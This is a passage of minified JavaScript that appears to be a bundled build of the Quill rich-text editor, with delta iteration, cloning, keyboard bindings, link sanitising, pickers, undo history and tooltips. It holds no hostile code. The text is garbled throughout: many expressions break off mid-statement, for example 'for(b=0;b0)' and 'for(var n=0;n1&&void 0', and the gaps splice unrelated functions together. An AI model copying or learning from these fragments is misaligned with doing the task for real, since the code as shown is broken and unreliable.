i=Object.keys(a).reduce((function(n,i){return void 0===e[i]&&(n[i]=a[i]),n}),{});return Object.keys(i).length>0?i:void 0}}},iterator:function(e){return new o(e)},length:function(e){return"number"===typeof e.delete?e.delete:"number"===typeof e.retain?e.retain:"string"===typeof e.insert?e.insert.length:1}};function o(e){this.ops=e,this.index=0,this.offset=0}o.prototype.hasNext=function(){return this.peekLength()<1/0},o.prototype.next=function(e){e||(e=1/0);var a=this.ops[this.index];if(a){var n=this.offset,i=r.length(a);if(e>=i-n?(e=i-n,this.index+=1,this.offset=0):this.offset+=e,"number"===typeof a.delete)return{delete:e};var t={};return a.attributes&&(t.attributes=a.attributes),"number"===typeof a.retain?t.retain=e:"string"===typeof a.insert?t.insert=a.insert.substr(n,e):t.insert=a.insert,t}return{retain:1/0}},o.prototype.peek=function(){return this.ops[this.index]},o.prototype.peekLength=function(){return this.ops[this.index]?r.length(this.ops[this.index])-this.offset:1/0},o.prototype.peekType=function(){return this.ops[this.index]?"number"===typeof this.ops[this.index].delete?"delete":"number"===typeof this.ops[this.index].retain?"retain":"insert":"retain"},o.prototype.rest=function(){if(this.hasNext()){if(0===this.offset)return this.ops.slice(this.index);var e=this.offset,a=this.index,n=this.next(),i=this.ops.slice(this.index);return this.offset=e,this.index=a,[n].concat(i)}return[]},e.exports=r},function(e,a){var n=function(){"use strict";function e(e,a){return null!=a&&e instanceof a}var a,n,i;try{a=Map}catch(s){a=function(){}}try{n=Set}catch(s){n=function(){}}try{i=Promise}catch(s){i=function(){}}function t(r,s,l,u,c){"object"===typeof s&&(l=s.depth,u=s.prototype,c=s.includeNonEnumerable,s=s.circular);var d=[],h=[],p="undefined"!=typeof Buffer;return"undefined"==typeof s&&(s=!0),"undefined"==typeof l&&(l=1/0),function r(l,m){if(null===l)return null;if(0===m)return l;var f,v;if("object"!=typeof l)return l;if(e(l,a))f=new a;else if(e(l,n))f=new n;else if(e(l,i))f=new i((function(e,a){l.then((function(a){e(r(a,m-1))}),(function(e){a(r(e,m-1))}))}));else if(t.__isArray(l))f=[];else if(t.__isRegExp(l))f=new RegExp(l.source,o(l)),l.lastIndex&&(f.lastIndex=l.lastIndex);else if(t.__isDate(l))f=new Date(l.getTime());else{if(p&&Buffer.isBuffer(l))return f=Buffer.allocUnsafe?Buffer.allocUnsafe(l.length):new Buffer(l.length),l.copy(f),f;e(l,Error)?f=Object.create(l):"undefined"==typeof u?(v=Object.getPrototypeOf(l),f=Object.create(v)):(f=Object.create(u),v=u)}if(s){var g=d.indexOf(l);if(-1!=g)return h[g];d.push(l),h.push(f)}for(var b in e(l,a)&&l.forEach((function(e,a){var n=r(a,m-1),i=r(e,m-1);f.set(n,i)})),e(l,n)&&l.forEach((function(e){var a=r(e,m-1);f.add(a)})),l){var k;v&&(k=Object.getOwnPropertyDescriptor(v,b)),k&&null==k.set||(f[b]=r(l[b],m-1))}if(Object.getOwnPropertySymbols){var y=Object.getOwnPropertySymbols(l);for(b=0;b0){if(s instanceof l.BlockEmbed||p instanceof l.BlockEmbed)return void this.optimize();if(s instanceof d.default){var m=s.newlineIndex(s.length(),!0);if(m>-1&&(s=s.split(m+1))===p)return void this.optimize()}else if(p instanceof d.default){var f=p.newlineIndex(0);f>-1&&p.split(f+1)}var v=p.children.head instanceof c.default?null:p.children.head;s.moveChildren(p,v),s.remove()}this.optimize()}},{key:"enable",value:function(){var e=!(arguments.length>0&&void 
0!==arguments[0])||arguments[0];this.domNode.setAttribute("contenteditable",e)}},{key:"formatAt",value:function(e,n,i,t){(null==this.whitelist||this.whitelist[i])&&(r(a.prototype.__proto__||Object.getPrototypeOf(a.prototype),"formatAt",this).call(this,e,n,i,t),this.optimize())}},{key:"insertAt",value:function(e,n,i){if(null==i||null==this.whitelist||this.whitelist[n]){if(e>=this.length())if(null==i||null==o.default.query(n,o.default.Scope.BLOCK)){var t=o.default.create(this.statics.defaultChild);this.appendChild(t),null==i&&n.endsWith("\n")&&(n=n.slice(0,-1)),t.insertAt(0,n,i)}else{var s=o.default.create(n,i);this.appendChild(s)}else r(a.prototype.__proto__||Object.getPrototypeOf(a.prototype),"insertAt",this).call(this,e,n,i);this.optimize()}}},{key:"insertBefore",value:function(e,n){if(e.statics.scope===o.default.Scope.INLINE_BLOT){var i=o.default.create(this.statics.defaultChild);i.appendChild(e),e=i}r(a.prototype.__proto__||Object.getPrototypeOf(a.prototype),"insertBefore",this).call(this,e,n)}},{key:"leaf",value:function(e){return this.path(e).pop()||[null,-1]}},{key:"line",value:function(e){return e===this.length()?this.line(e-1):this.descendant(m,e)}},{key:"lines",value:function(){var e=arguments.length>0&&void 0!==arguments[0]?arguments[0]:0,a=arguments.length>1&&void 0!==arguments[1]?arguments[1]:Number.MAX_VALUE,n=function e(a,n,i){var t=[],r=i;return a.children.forEachAt(n,i,(function(a,n,i){m(a)?t.push(a):a instanceof o.default.Container&&(t=t.concat(e(a,n,r))),r-=i})),t};return n(this,e,a)}},{key:"optimize",value:function(){var e=arguments.length>0&&void 0!==arguments[0]?arguments[0]:[],n=arguments.length>1&&void 0!==arguments[1]?arguments[1]:{};!0!==this.batch&&(r(a.prototype.__proto__||Object.getPrototypeOf(a.prototype),"optimize",this).call(this,e,n),e.length>0&&this.emitter.emit(s.default.events.SCROLL_OPTIMIZE,e,n))}},{key:"path",value:function(e){return r(a.prototype.__proto__||Object.getPrototypeOf(a.prototype),"path",this).call(this,e).slice(1)}},{key:"update",value:function(e){if(!0!==this.batch){var n=s.default.sources.USER;"string"===typeof e&&(n=e),Array.isArray(e)||(e=this.observer.takeRecords()),e.length>0&&this.emitter.emit(s.default.events.SCROLL_BEFORE_UPDATE,n,e),r(a.prototype.__proto__||Object.getPrototypeOf(a.prototype),"update",this).call(this,e.concat([])),e.length>0&&this.emitter.emit(s.default.events.SCROLL_UPDATE,n,e)}}}]),a}(o.default.Scroll);f.blotName="scroll",f.className="ql-editor",f.tagName="DIV",f.defaultChild="block",f.allowedChildren=[u.default,l.BlockEmbed,h.default],a.default=f},function(e,a,n){"use strict";Object.defineProperty(a,"__esModule",{value:!0}),a.SHORTKEY=a.default=void 0;var i="function"===typeof Symbol&&"symbol"===typeof Symbol.iterator?function(e){return typeof e}:function(e){return e&&"function"===typeof Symbol&&e.constructor===Symbol&&e!==Symbol.prototype?"symbol":typeof e},t=function(e,a){if(Array.isArray(e))return e;if(Symbol.iterator in Object(e))return function(e,a){var n=[],i=!0,t=!1,r=void 0;try{for(var o,s=e[Symbol.iterator]();!(i=(o=s.next()).done)&&(n.push(o.value),!a||n.length!==a);i=!0);}catch(l){t=!0,r=l}finally{try{!i&&s.return&&s.return()}finally{if(t)throw r}}return n}(e,a);throw new TypeError("Invalid attempt to destructure non-iterable instance")},r=function(){function e(e,a){for(var n=0;n1&&void 0!==arguments[1]?arguments[1]:{},n=arguments.length>2&&void 0!==arguments[2]?arguments[2]:{},i=C(e);if(null==i||null==i.key)return g.warn("Attempted to add invalid keyboard binding",i);"function"===typeof 
a&&(a={handler:a}),"function"===typeof n&&(n={handler:n}),i=(0,l.default)(i,a,n),this.bindings[i.key]=this.bindings[i.key]||[],this.bindings[i.key].push(i)}},{key:"listen",value:function(){var e=this;this.quill.root.addEventListener("keydown",(function(n){if(!n.defaultPrevented){var r=n.which||n.keyCode,o=(e.bindings[r]||[]).filter((function(e){return a.match(n,e)}));if(0!==o.length){var l=e.quill.getSelection();if(null!=l&&e.quill.hasFocus()){var u=e.quill.getLine(l.index),c=t(u,2),h=c[0],p=c[1],m=e.quill.getLeaf(l.index),f=t(m,2),v=f[0],g=f[1],b=0===l.length?[v,g]:e.quill.getLeaf(l.index+l.length),k=t(b,2),y=k[0],x=k[1],S=v instanceof d.default.Text?v.value().slice(0,g):"",A=y instanceof d.default.Text?y.value().slice(x):"",w={collapsed:0===l.length,empty:0===l.length&&h.length()<=1,format:e.quill.getFormat(l),offset:p,prefix:S,suffix:A};o.some((function(a){if(null!=a.collapsed&&a.collapsed!==w.collapsed)return!1;if(null!=a.empty&&a.empty!==w.empty)return!1;if(null!=a.offset&&a.offset!==w.offset)return!1;if(Array.isArray(a.format)){if(a.format.every((function(e){return null==w.format[e]})))return!1}else if("object"===i(a.format)&&!Object.keys(a.format).every((function(e){return!0===a.format[e]?null!=w.format[e]:!1===a.format[e]?null==w.format[e]:(0,s.default)(a.format[e],w.format[e])})))return!1;return!(null!=a.prefix&&!a.prefix.test(w.prefix))&&!(null!=a.suffix&&!a.suffix.test(w.suffix))&&!0!==a.handler.call(e,l,w)}))&&n.preventDefault()}}}}))}}]),a}(m.default);function y(e,a){var n,i=e===k.keys.LEFT?"prefix":"suffix";return v(n={key:e,shiftKey:a,altKey:null},i,/^$/),v(n,"handler",(function(n){var i=n.index;e===k.keys.RIGHT&&(i+=n.length+1);var r=this.quill.getLeaf(i);return!(t(r,1)[0]instanceof d.default.Embed)||(e===k.keys.LEFT?a?this.quill.setSelection(n.index-1,n.length+1,h.default.sources.USER):this.quill.setSelection(n.index-1,h.default.sources.USER):a?this.quill.setSelection(n.index,n.length+1,h.default.sources.USER):this.quill.setSelection(n.index+n.length+1,h.default.sources.USER),!1)})),n}function x(e,a){if(!(0===e.index||this.quill.getLength()<=1)){var n=this.quill.getLine(e.index),i=t(n,1)[0],r={};if(0===a.offset){var o=this.quill.getLine(e.index-1),s=t(o,1)[0];if(null!=s&&s.length()>1){var l=i.formats(),u=this.quill.getFormat(e.index-1,1);r=c.default.attributes.diff(l,u)||{}}}var d=/[\uD800-\uDBFF][\uDC00-\uDFFF]$/.test(a.prefix)?2:1;this.quill.deleteText(e.index-d,d,h.default.sources.USER),Object.keys(r).length>0&&this.quill.formatLine(e.index-d,d,r,h.default.sources.USER),this.quill.focus()}}function S(e,a){var n=/^[\uD800-\uDBFF][\uDC00-\uDFFF]/.test(a.suffix)?2:1;if(!(e.index>=this.quill.getLength()-n)){var i={},r=0,o=this.quill.getLine(e.index),s=t(o,1)[0];if(a.offset>=s.length()-1){var l=this.quill.getLine(e.index+1),u=t(l,1)[0];if(u){var d=s.formats(),p=this.quill.getFormat(e.index,1);i=c.default.attributes.diff(d,p)||{},r=u.length()}}this.quill.deleteText(e.index,n,h.default.sources.USER),Object.keys(i).length>0&&this.quill.formatLine(e.index+r-1,n,i,h.default.sources.USER)}}function A(e){var a=this.quill.getLines(e),n={};if(a.length>1){var i=a[0].formats(),t=a[a.length-1].formats();n=c.default.attributes.diff(t,i)||{}}this.quill.deleteText(e,h.default.sources.USER),Object.keys(n).length>0&&this.quill.formatLine(e.index,1,n,h.default.sources.USER),this.quill.setSelection(e.index,h.default.sources.SILENT),this.quill.focus()}function w(e,a){var n=this;e.length>0&&this.quill.scroll.deleteAt(e.index,e.length);var i=Object.keys(a.format).reduce((function(e,n){return 
d.default.query(n,d.default.Scope.BLOCK)&&!Array.isArray(a.format[n])&&(e[n]=a.format[n]),e}),{});this.quill.insertText(e.index,"\n",i,h.default.sources.USER),this.quill.setSelection(e.index+1,h.default.sources.SILENT),this.quill.focus(),Object.keys(a.format).forEach((function(e){null==i[e]&&(Array.isArray(a.format[e])||"link"!==e&&n.quill.format(e,a.format[e],h.default.sources.USER))}))}function M(e){return{key:k.keys.TAB,shiftKey:!e,format:{"code-block":!0},handler:function(a){var n=d.default.query("code-block"),i=a.index,r=a.length,o=this.quill.scroll.descendant(n,i),s=t(o,2),l=s[0],u=s[1];if(null!=l){var c=this.quill.getIndex(l),p=l.newlineIndex(u,!0)+1,m=l.newlineIndex(c+u+r),f=l.domNode.textContent.slice(p,m).split("\n");u=0,f.forEach((function(a,t){e?(l.insertAt(p+u,n.TAB),u+=n.TAB.length,0===t?i+=n.TAB.length:r+=n.TAB.length):a.startsWith(n.TAB)&&(l.deleteAt(p+u,n.TAB.length),u-=n.TAB.length,0===t?i-=n.TAB.length:r-=n.TAB.length),u+=a.length+1})),this.quill.update(h.default.sources.USER),this.quill.setSelection(i,r,h.default.sources.SILENT)}}}}function j(e){return{key:e[0].toUpperCase(),shortKey:!0,handler:function(a,n){this.quill.format(e,!n.format[e],h.default.sources.USER)}}}function C(e){if("string"===typeof e||"number"===typeof e)return C({key:e});if("object"===("undefined"===typeof e?"undefined":i(e))&&(e=(0,o.default)(e,!1)),"string"===typeof e.key)if(null!=k.keys[e.key.toUpperCase()])e.key=k.keys[e.key.toUpperCase()];else{if(1!==e.key.length)return null;e.key=e.key.toUpperCase().charCodeAt(0)}return e.shortKey&&(e[b]=e.shortKey,delete e.shortKey),e}k.keys={BACKSPACE:8,TAB:9,ENTER:13,ESCAPE:27,LEFT:37,UP:38,RIGHT:39,DOWN:40,DELETE:46},k.DEFAULTS={bindings:{bold:j("bold"),italic:j("italic"),underline:j("underline"),indent:{key:k.keys.TAB,format:["blockquote","indent","list"],handler:function(e,a){if(a.collapsed&&0!==a.offset)return!0;this.quill.format("indent","+1",h.default.sources.USER)}},outdent:{key:k.keys.TAB,shiftKey:!0,format:["blockquote","indent","list"],handler:function(e,a){if(a.collapsed&&0!==a.offset)return!0;this.quill.format("indent","-1",h.default.sources.USER)}},"outdent backspace":{key:k.keys.BACKSPACE,collapsed:!0,shiftKey:null,metaKey:null,ctrlKey:null,altKey:null,format:["indent","list"],offset:0,handler:function(e,a){null!=a.format.indent?this.quill.format("indent","-1",h.default.sources.USER):null!=a.format.list&&this.quill.format("list",!1,h.default.sources.USER)}},"indent code-block":M(!0),"outdent code-block":M(!1),"remove tab":{key:k.keys.TAB,shiftKey:!0,collapsed:!0,prefix:/\t$/,handler:function(e){this.quill.deleteText(e.index-1,1,h.default.sources.USER)}},tab:{key:k.keys.TAB,handler:function(e){this.quill.history.cutoff();var a=(new u.default).retain(e.index).delete(e.length).insert("\t");this.quill.updateContents(a,h.default.sources.USER),this.quill.history.cutoff(),this.quill.setSelection(e.index+1,h.default.sources.SILENT)}},"list empty enter":{key:k.keys.ENTER,collapsed:!0,format:["list"],empty:!0,handler:function(e,a){this.quill.format("list",!1,h.default.sources.USER),a.format.indent&&this.quill.format("indent",!1,h.default.sources.USER)}},"checklist enter":{key:k.keys.ENTER,collapsed:!0,format:{list:"checked"},handler:function(e){var a=this.quill.getLine(e.index),n=t(a,2),i=n[0],r=n[1],o=(0,l.default)({},i.formats(),{list:"checked"}),s=(new 
u.default).retain(e.index).insert("\n",o).retain(i.length()-r-1).retain(1,{list:"unchecked"});this.quill.updateContents(s,h.default.sources.USER),this.quill.setSelection(e.index+1,h.default.sources.SILENT),this.quill.scrollIntoView()}},"header enter":{key:k.keys.ENTER,collapsed:!0,format:["header"],suffix:/^$/,handler:function(e,a){var n=this.quill.getLine(e.index),i=t(n,2),r=i[0],o=i[1],s=(new u.default).retain(e.index).insert("\n",a.format).retain(r.length()-o-1).retain(1,{header:null});this.quill.updateContents(s,h.default.sources.USER),this.quill.setSelection(e.index+1,h.default.sources.SILENT),this.quill.scrollIntoView()}},"list autofill":{key:" ",collapsed:!0,format:{list:!1},prefix:/^\s*?(\d+\.|-|\*|\[ ?\]|\[x\])$/,handler:function(e,a){var n=a.prefix.length,i=this.quill.getLine(e.index),r=t(i,2),o=r[0],s=r[1];if(s>n)return!0;var l=void 0;switch(a.prefix.trim()){case"[]":case"[ ]":l="unchecked";break;case"[x]":l="checked";break;case"-":case"*":l="bullet";break;default:l="ordered"}this.quill.insertText(e.index," ",h.default.sources.USER),this.quill.history.cutoff();var c=(new u.default).retain(e.index-s).delete(n+1).retain(o.length()-2-s).retain(1,{list:l});this.quill.updateContents(c,h.default.sources.USER),this.quill.history.cutoff(),this.quill.setSelection(e.index-n,h.default.sources.SILENT)}},"code exit":{key:k.keys.ENTER,collapsed:!0,format:["code-block"],prefix:/\n\n$/,suffix:/^\s+$/,handler:function(e){var a=this.quill.getLine(e.index),n=t(a,2),i=n[0],r=n[1],o=(new u.default).retain(e.index+i.length()-r-2).retain(1,{"code-block":null}).delete(1);this.quill.updateContents(o,h.default.sources.USER)}},"embed left":y(k.keys.LEFT,!1),"embed left shift":y(k.keys.LEFT,!0),"embed right":y(k.keys.RIGHT,!1),"embed right shift":y(k.keys.RIGHT,!0)}},a.default=k,a.SHORTKEY=b},function(e,a,n){"use strict";Object.defineProperty(a,"__esModule",{value:!0});var i=function(e,a){if(Array.isArray(e))return e;if(Symbol.iterator in Object(e))return function(e,a){var n=[],i=!0,t=!1,r=void 0;try{for(var o,s=e[Symbol.iterator]();!(i=(o=s.next()).done)&&(n.push(o.value),!a||n.length!==a);i=!0);}catch(l){t=!0,r=l}finally{try{!i&&s.return&&s.return()}finally{if(t)throw r}}return n}(e,a);throw new TypeError("Invalid attempt to destructure non-iterable instance")},t=function e(a,n,i){null===a&&(a=Function.prototype);var t=Object.getOwnPropertyDescriptor(a,n);if(void 0===t){var r=Object.getPrototypeOf(a);return null===r?void 0:e(r,n,i)}if("value"in t)return t.value;var o=t.get;return void 0!==o?o.call(i):void 0},r=function(){function e(e,a){for(var n=0;n-1}u.blotName="link",u.tagName="A",u.SANITIZED_URL="about:blank",u.PROTOCOL_WHITELIST=["http","https","mailto","tel"],a.default=u,a.sanitize=c},function(e,a,n){"use strict";Object.defineProperty(a,"__esModule",{value:!0});var i="function"===typeof Symbol&&"symbol"===typeof Symbol.iterator?function(e){return typeof e}:function(e){return e&&"function"===typeof Symbol&&e.constructor===Symbol&&e!==Symbol.prototype?"symbol":typeof e},t=function(){function e(e,a){for(var n=0;n1&&void 
0!==arguments[1]&&arguments[1],n=this.container.querySelector(".ql-selected");if(e!==n&&(null!=n&&n.classList.remove("ql-selected"),null!=e&&(e.classList.add("ql-selected"),this.select.selectedIndex=[].indexOf.call(e.parentNode.children,e),e.hasAttribute("data-value")?this.label.setAttribute("data-value",e.getAttribute("data-value")):this.label.removeAttribute("data-value"),e.hasAttribute("data-label")?this.label.setAttribute("data-label",e.getAttribute("data-label")):this.label.removeAttribute("data-label"),a))){if("function"===typeof Event)this.select.dispatchEvent(new Event("change"));else if("object"===("undefined"===typeof Event?"undefined":i(Event))){var t=document.createEvent("Event");t.initEvent("change",!0,!0),this.select.dispatchEvent(t)}this.close()}}},{key:"update",value:function(){var e=void 0;if(this.select.selectedIndex>-1){var a=this.container.querySelector(".ql-picker-options").children[this.select.selectedIndex];e=this.select.options[this.select.selectedIndex],this.selectItem(a)}else this.selectItem(null);var n=null!=e&&e!==this.select.querySelector("option[selected]");this.label.classList.toggle("ql-active",n)}}]),e}();a.default=c},function(e,a,n){"use strict";Object.defineProperty(a,"__esModule",{value:!0});var i=g(n(0)),t=g(n(5)),r=n(4),o=g(r),s=g(n(16)),l=g(n(25)),u=g(n(24)),c=g(n(35)),d=g(n(6)),h=g(n(22)),p=g(n(7)),m=g(n(55)),f=g(n(42)),v=g(n(23));function g(e){return e&&e.__esModule?e:{default:e}}t.default.register({"blots/block":o.default,"blots/block/embed":r.BlockEmbed,"blots/break":s.default,"blots/container":l.default,"blots/cursor":u.default,"blots/embed":c.default,"blots/inline":d.default,"blots/scroll":h.default,"blots/text":p.default,"modules/clipboard":m.default,"modules/history":f.default,"modules/keyboard":v.default}),i.default.register(o.default,s.default,u.default,d.default,h.default,p.default),a.default=t.default},function(e,a,n){"use strict";Object.defineProperty(a,"__esModule",{value:!0});var i=n(1),t=function(){function e(e){this.domNode=e,this.domNode[i.DATA_KEY]={blot:this}}return Object.defineProperty(e.prototype,"statics",{get:function(){return this.constructor},enumerable:!0,configurable:!0}),e.create=function(e){if(null==this.tagName)throw new i.ParchmentError("Blot definition missing tagName");var a;return Array.isArray(this.tagName)?("string"===typeof e&&(e=e.toUpperCase(),parseInt(e).toString()===e&&(e=parseInt(e))),a="number"===typeof e?document.createElement(this.tagName[e-1]):this.tagName.indexOf(e)>-1?document.createElement(e):document.createElement(this.tagName[0])):a=document.createElement(this.tagName),this.className&&a.classList.add(this.className),a},e.prototype.attach=function(){null!=this.parent&&(this.scroll=this.parent.scroll)},e.prototype.clone=function(){var e=this.domNode.cloneNode(!1);return i.create(e)},e.prototype.detach=function(){null!=this.parent&&this.parent.removeChild(this),delete this.domNode[i.DATA_KEY]},e.prototype.deleteAt=function(e,a){this.isolate(e,a).remove()},e.prototype.formatAt=function(e,a,n,t){var r=this.isolate(e,a);if(null!=i.query(n,i.Scope.BLOT)&&t)r.wrap(n,t);else if(null!=i.query(n,i.Scope.ATTRIBUTE)){var o=i.create(this.statics.scope);r.wrap(o),o.format(n,t)}},e.prototype.insertAt=function(e,a,n){var t=null==n?i.create("text",a):i.create(a,n),r=this.split(e);this.parent.insertBefore(t,r)},e.prototype.insertInto=function(e,a){void 0===a&&(a=null),null!=this.parent&&this.parent.children.remove(this);var 
n=null;e.children.insertBefore(this,a),null!=a&&(n=a.domNode),this.domNode.parentNode==e.domNode&&this.domNode.nextSibling==n||e.domNode.insertBefore(this.domNode,n),this.parent=e,this.attach()},e.prototype.isolate=function(e,a){var n=this.split(e);return n.split(a),n},e.prototype.length=function(){return 1},e.prototype.offset=function(e){return void 0===e&&(e=this.parent),null==this.parent||this==e?0:this.parent.children.offset(this)+this.parent.offset(e)},e.prototype.optimize=function(e){null!=this.domNode[i.DATA_KEY]&&delete this.domNode[i.DATA_KEY].mutations},e.prototype.remove=function(){null!=this.domNode.parentNode&&this.domNode.parentNode.removeChild(this.domNode),this.detach()},e.prototype.replace=function(e){null!=e.parent&&(e.parent.insertBefore(this,e.next),e.remove())},e.prototype.replaceWith=function(e,a){var n="string"===typeof e?i.create(e,a):e;return n.replace(this),n},e.prototype.split=function(e,a){return 0===e?this:this.next},e.prototype.update=function(e,a){},e.prototype.wrap=function(e,a){var n="string"===typeof e?i.create(e,a):e;return null!=this.parent&&this.parent.insertBefore(n,this.next),n.appendChild(this),n},e.blotName="abstract",e}();a.default=t},function(e,a,n){"use strict";Object.defineProperty(a,"__esModule",{value:!0});var i=n(12),t=n(32),r=n(33),o=n(1),s=function(){function e(e){this.attributes={},this.domNode=e,this.build()}return e.prototype.attribute=function(e,a){a?e.add(this.domNode,a)&&(null!=e.value(this.domNode)?this.attributes[e.attrName]=e:delete this.attributes[e.attrName]):(e.remove(this.domNode),delete this.attributes[e.attrName])},e.prototype.build=function(){var e=this;this.attributes={};var a=i.default.keys(this.domNode),n=t.default.keys(this.domNode),s=r.default.keys(this.domNode);a.concat(n).concat(s).forEach((function(a){var n=o.query(a,o.Scope.ATTRIBUTE);n instanceof i.default&&(e.attributes[n.attrName]=n)}))},e.prototype.copy=function(e){var a=this;Object.keys(this.attributes).forEach((function(n){var i=a.attributes[n].value(a.domNode);e.format(n,i)}))},e.prototype.move=function(e){var a=this;this.copy(e),Object.keys(this.attributes).forEach((function(e){a.attributes[e].remove(a.domNode)})),this.attributes={}},e.prototype.values=function(){var e=this;return Object.keys(this.attributes).reduce((function(a,n){return a[n]=e.attributes[n].value(e.domNode),a}),{})},e}();a.default=s},function(e,a,n){"use strict";var i=this&&this.__extends||function(){var e=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(e,a){e.__proto__=a}||function(e,a){for(var n in a)a.hasOwnProperty(n)&&(e[n]=a[n])};return function(a,n){function i(){this.constructor=a}e(a,n),a.prototype=null===n?Object.create(n):(i.prototype=n.prototype,new i)}}();function t(e,a){return(e.getAttribute("class")||"").split(/\s+/).filter((function(e){return 0===e.indexOf(a+"-")}))}Object.defineProperty(a,"__esModule",{value:!0});var r=function(e){function a(){return null!==e&&e.apply(this,arguments)||this}return i(a,e),a.keys=function(e){return(e.getAttribute("class")||"").split(/\s+/).map((function(e){return e.split("-").slice(0,-1).join("-")}))},a.prototype.add=function(e,a){return!!this.canAdd(e,a)&&(this.remove(e),e.classList.add(this.keyName+"-"+a),!0)},a.prototype.remove=function(e){t(e,this.keyName).forEach((function(a){e.classList.remove(a)})),0===e.classList.length&&e.removeAttribute("class")},a.prototype.value=function(e){var a=(t(e,this.keyName)[0]||"").slice(this.keyName.length+1);return this.canAdd(e,a)?a:""},a}(n(12).default);a.default=r},function(e,a,n){"use 
strict";var i=this&&this.__extends||function(){var e=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(e,a){e.__proto__=a}||function(e,a){for(var n in a)a.hasOwnProperty(n)&&(e[n]=a[n])};return function(a,n){function i(){this.constructor=a}e(a,n),a.prototype=null===n?Object.create(n):(i.prototype=n.prototype,new i)}}();function t(e){var a=e.split("-"),n=a.slice(1).map((function(e){return e[0].toUpperCase()+e.slice(1)})).join("");return a[0]+n}Object.defineProperty(a,"__esModule",{value:!0});var r=function(e){function a(){return null!==e&&e.apply(this,arguments)||this}return i(a,e),a.keys=function(e){return(e.getAttribute("style")||"").split(";").map((function(e){return e.split(":")[0].trim()}))},a.prototype.add=function(e,a){return!!this.canAdd(e,a)&&(e.style[t(this.keyName)]=a,!0)},a.prototype.remove=function(e){e.style[t(this.keyName)]="",e.getAttribute("style")||e.removeAttribute("style")},a.prototype.value=function(e){var a=e.style[t(this.keyName)];return this.canAdd(e,a)?a:""},a}(n(12).default);a.default=r},function(e,a,n){"use strict";Object.defineProperty(a,"__esModule",{value:!0});var i=function(){function e(e,a){for(var n=0;ni&&this.stack.undo.length>0){var t=this.stack.undo.pop();n=n.compose(t.undo),e=t.redo.compose(e)}else this.lastRecorded=i;this.stack.undo.push({redo:e,undo:n}),this.stack.undo.length>this.options.maxStack&&this.stack.undo.shift()}}},{key:"redo",value:function(){this.change("redo","undo")}},{key:"transform",value:function(e){this.stack.undo.forEach((function(a){a.undo=e.transform(a.undo,!0),a.redo=e.transform(a.redo,!0)})),this.stack.redo.forEach((function(a){a.undo=e.transform(a.undo,!0),a.redo=e.transform(a.redo,!0)}))}},{key:"undo",value:function(){this.change("undo","redo")}}]),a}(o(n(9)).default);function l(e){var a=e.reduce((function(e,a){return e+=a.delete||0}),0),n=e.length()-a;return function(e){var a=e.ops[e.ops.length-1];return null!=a&&(null!=a.insert?"string"===typeof a.insert&&a.insert.endsWith("\n"):null!=a.attributes&&Object.keys(a.attributes).some((function(e){return null!=t.default.query(e,t.default.Scope.BLOCK)})))}(e)&&(n-=1),n}s.DEFAULTS={delay:1e3,maxStack:100,userOnly:!1},a.default=s,a.getLastChangeIndex=l},function(e,a,n){"use strict";Object.defineProperty(a,"__esModule",{value:!0}),a.default=a.BaseTooltip=void 0;var i=function(){function e(e,a){for(var n=0;n0&&void 0!==arguments[0]?arguments[0]:"link",a=arguments.length>1&&void 0!==arguments[1]?arguments[1]:null;this.root.classList.remove("ql-hidden"),this.root.classList.add("ql-editing"),null!=a?this.textbox.value=a:e!==this.root.getAttribute("data-mode")&&(this.textbox.value=""),this.position(this.quill.getBounds(this.quill.selection.savedRange)),this.textbox.select(),this.textbox.setAttribute("placeholder",this.textbox.getAttribute("data-"+e)||""),this.root.setAttribute("data-mode",e)}},{key:"restoreFocus",value:function(){var e=this.quill.scrollingContainer.scrollTop;this.quill.focus(),this.quill.scrollingContainer.scrollTop=e}},{key:"save",value:function(){var e=this.textbox.value;switch(this.root.getAttribute("data-mode")){case"link":var a=this.quill.root.scrollTop;this.linkRange?(this.quill.formatText(this.linkRange,"link",e,s.default.sources.USER),delete this.linkRange):(this.restoreFocus(),this.quill.format("link",e,s.default.sources.USER)),this.quill.root.scrollTop=a;break;case"video":e=function(e){var 
a=e.match(/^(?:(https?):\/\/)?(?:(?:www|m)\.)?youtube\.com\/watch.*v=([a-zA-Z0-9_-]+)/)||e.match(/^(?:(https?):\/\/)?(?:(?:www|m)\.)?youtu\.be\/([a-zA-Z0-9_-]+)/);return a?(a[1]||"https")+"://www.youtube.com/embed/"+a[2]+"?showinfo=0":(a=e.match(/^(?:(https?):\/\/)?(?:www\.)?vimeo\.com\/(\d+)/))?(a[1]||"https")+"://player.vimeo.com/video/"+a[2]+"/":e}(e);case"formula":if(!e)break;var n=this.quill.getSelection(!0);if(null!=n){var i=n.index+n.length;this.quill.insertEmbed(i,this.root.getAttribute("data-mode"),e,s.default.sources.USER),"formula"===this.root.getAttribute("data-mode")&&this.quill.insertText(i+1," ",s.default.sources.USER),this.quill.setSelection(i+2,s.default.sources.USER)}}this.textbox.value="",this.hide()}}]),a}(p.default);function M(e,a){var n=arguments.length>2&&void 0!==arguments[2]&&arguments[2];a.forEach((function(a){var i=document.createElement("option");a===n?i.setAttribute("selected","selected"):i.setAttribute("value",a),e.appendChild(i)}))}a.BaseTooltip=w,a.default=A},function(e,a,n){"use strict";Object.defineProperty(a,"__esModule",{value:!0});var i=function(){function e(){this.head=this.tail=null,this.length=0}return e.prototype.append=function(){for(var e=[],a=0;a1&&this.append.apply(this,e.slice(1))},e.prototype.contains=function(e){for(var a,n=this.iterator();a=n();)if(a===e)return!0;return!1},e.prototype.insertBefore=function(e,a){e&&(e.next=a,null!=a?(e.prev=a.prev,null!=a.prev&&(a.prev.next=e),a.prev=e,a===this.head&&(this.head=e)):null!=this.tail?(this.tail.next=e,e.prev=this.tail,this.tail=e):(e.prev=null,this.head=this.tail=e),this.length+=1)},e.prototype.offset=function(e){for(var a=0,n=this.head;null!=n;){if(n===e)return a;a+=n.length(),n=n.next}return-1},e.prototype.remove=function(e){this.contains(e)&&(null!=e.prev&&(e.prev.next=e.next),null!=e.next&&(e.next.prev=e.prev),e===this.head&&(this.head=e.next),e===this.tail&&(this.tail=e.prev),this.length-=1)},e.prototype.iterator=function(e){return void 0===e&&(e=this.head),function(){var a=e;return null!=e&&(e=e.next),a}},e.prototype.find=function(e,a){void 0===a&&(a=!1);for(var n,i=this.iterator();n=i();){var t=n.length();if(eo?n(i,e-o,Math.min(a,o+l-e)):n(i,0,Math.min(l,e+a-o)),o+=l}},e.prototype.map=function(e){return this.reduce((function(a,n){return a.push(e(n)),a}),[])},e.prototype.reduce=function(e,a){for(var n,i=this.iterator();n=i();)a=e(a,n);return 